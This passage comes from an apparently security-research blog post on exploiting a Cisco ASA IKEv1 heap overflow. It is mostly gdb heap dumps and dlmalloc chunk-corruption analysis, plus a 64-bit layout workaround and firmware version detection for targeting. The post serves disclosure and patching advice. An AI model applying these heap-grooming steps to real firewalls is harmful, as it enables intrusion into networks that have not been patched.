0x7fff99b6b540 M sz:0x00200 fl:CP alloc_pc:0x00a0cc50,-
0x7fff99b6b740 M sz:0x00200 fl:CP alloc_pc:0x00a0cc50,-

We can see that the adjacent 0x30-byte free chunk ends at 0x7fff99b6b340:

(gdb) x /20wx 0x7fff99b6b310
0x7fff99b6b310: 0xb04884c8 0x00007fff 0x000004a1 0x00000000
0x7fff99b6b320: 0xa0fe8170 0x00007fff 0x994850b0 0x00007fff
0x7fff99b6b330: 0xf3ee0123 0x00000000 0x00000000 0xf3eecdef
0x7fff99b6b340: 0x00000030 0x00000000 0x00000202 0x00000000
0x7fff99b6b350: 0xa11c0123 0x000001bc 0x00000000 0x00000000
struct malloc_chunk @ 0x7fff99b6b310 {
prev_foot = 0x7fffb04884c8
head = 0x30 (PINUSE)
fd = 0x7fffa0fe8170
bk = 0x7fff994850b0
struct mp_header @ 0x7fff99b6b330 {
mh_refcount = 0xf3ee0123
mh_unused = 0x0
mh_fd_link = 0xf3eecdef00000000 (unmapped)
mh_bk_link = 0x30 (unmapped)
allocator_pc = 0x202 (-)
free_pc = 0x1bca11c0123 (-)
[!] Chunk corrupt? Bad size

Once we have replaced its dlmalloc-2.8.x size (head) field, it is treated as a malloc_tree_chunk because it is bigger than 0x100 bytes. As you can see below, the parent field points to the following 0x200-byte chunk's prev_foot field, instead of the 0x30-byte free chunk's data that we controlled on 32-bit.

Note below that the 0x200-byte chunk's prev_foot happens to be 0x30 in our case. On 32-bit we deliberately allocate something containing NULL bytes into the future 0x200-byte hole so that, even after it is freed and we allocate the 0x1d0 reassembled packet into the hole, the following 0x30-byte chunk still contains NULL bytes. This is done because, when the heap inevitably interprets malloc_tree_chunk->parent, it is read from inside the 0x30-byte free chunk's data.

(gdb) x /20wx 0x7fff99b6b310
0x7fff99b6b310: 0xb04884c8 0x00007fff 0x000004a1 0x00000000
0x7fff99b6b320: 0xa0fe8170 0x00007fff 0x994850b0 0x00007fff
0x7fff99b6b330: 0xf3ee0123 0x00000000 0x00000000 0xf3eecdef
0x7fff99b6b340: 0x00000030 0x00000000 0x00000202 0x00000000
0x7fff99b6b350: 0xa11c0123 0x000001bc 0x00000000 0x00000000
(gdb) dlchunk $rdi -v -x
struct malloc_tree_chunk @ 0x7fff99b6b310 {
prev_foot = 0x7fffb04884c8
head = 0x4a0 (PINUSE)
fd = 0x7fffa0fe8170
bk = 0x7fff994850b0
left = 0xf3ee0123
right = 0xf3eecdef00000000
parent = 0x30
bindex = 0x202
struct mp_header @ 0x7fff99b6b350 {
allocator_pc = 0x1bca11c0123 (-)
free_pc = 0x0 (-)
0x450 bytes of chunk data:
0x7fff99b6b360: 0x99b6af50 0x00007fff 0x99b6b550 0x00007fff
0x7fff99b6b370: 0x00a0cc50 0x00000000 0x0000000d 0x12345678
0x7fff99b6b380: 0x45304136 0x4a395530 0xa2aec837 0x49f89c60
0x7fff99b6b390: 0x08021084 0x01000000 0xbc010000 0xa0010000
0x7fff99b6b3a0: 0x00011200 0x43434343 0x43434343 0x43434343
0x7fff99b6b3b0: 0x43434343 0x43434343 0x43434343 0x43434343
...
0x7fff99b6b530: 0x43434343 0x43434343 0x43434343 0xa11ccdef

A workaround for this in 64-bit is to allocate a 0x1c0 chunk (instead of a 0x1d0) so it leaves a 0x40 free chunk that will overlap with the parent field to ensure it is NULL.
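The workaround follows from the 64-bit malloc_tree_chunk layout: with 8-byte fields, parent lives at offset 0x30, which is exactly where a 0x30-byte chunk ends. A sketch modelling the layout with fixed-width fields so the offsets hold on any host (the struct name is ours; field order matches the dlmalloc definition shown earlier):

```c
#include <stddef.h>
#include <stdint.h>

/* 64-bit malloc_tree_chunk modelled with explicit 8-byte fields */
struct tree_chunk64 {
    uint64_t prev_foot;  /* +0x00 */
    uint64_t head;       /* +0x08 */
    uint64_t fd;         /* +0x10 */
    uint64_t bk;         /* +0x18 */
    uint64_t child[2];   /* +0x20 */
    uint64_t parent;     /* +0x30 */
    uint32_t index;      /* +0x38 */
};
```

A 0x30-byte fake chunk therefore ends right before its own parent field (which lands on the next chunk's prev_foot), while a 0x40-byte chunk fully contains it, letting us prime parent to NULL.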

Version detection

Our exploit relies on having the exact ASA firmware version in order to know the addresses targeted by our mirror writes.

To figure this out, where possible, we use one of the multiple publicly reported WebVPN/AnyConnect version leaks. We realised that most devices we see that are vulnerable to the IKE heap overflow bug are also vulnerable to the ASA version leaks and often have these services running.

Conclusions

This research highlights some of the quirks of exploiting this bug over IKEv1 in comparison to IKEv2. It also highlights the need to patch all Cisco ASA firewalls rather than rolling back to older protocols, such as IKEv1, to mitigate the vulnerability. We have observed many clients ‘mitigating’ the risk of this bug simply by shutting off IKEv2, which is clearly not effective.

We would appreciate any feedback or corrections. If you would like to contact us, we can be reached by email or Twitter: aaron(dot)adams(at)nccgroup(dot)trust / @fidgetingbits and cedric(dot)halbronn(at)nccgroup(dot)trust / @saidelike.

Read all posts in the Cisco ASA series

References

[1] https://blog.exodusintel.com/2016/02/10/firewall-hacking/

[2] https://github.com/nccgroup/libdlmalloc

[3] https://github.com/nccgroup/libmempool

[4] https://github.com/bootleg/ret-sync/

[5] https://www.cisco.com/c/en/us/td/docs/security/asa/asa90/configuration/guide/asa_90_cli_config/vpn_ike.html

Published date:  10 November 2017

Written by:  Aaron Adams and Cedric Halbronn
